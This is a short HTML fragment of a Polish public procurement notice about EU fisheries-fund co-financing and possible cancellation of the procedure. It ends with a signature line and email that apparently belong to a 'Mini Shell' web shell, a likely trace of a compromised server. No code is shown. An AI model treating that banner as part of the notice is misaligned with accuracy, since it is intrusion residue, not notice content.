<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że zadanie będzie współfinansowane ze środków Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 2013 w ramach środka 4.1. Rozwój obszarów zależnych od rybactwa z wyłączeniem realizacji operacji polegających na funkcjonowaniu lokalnej grupy rybackiej LGR oraz nabywaniu umiejętności i aktywizacji lokalnych społeczności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com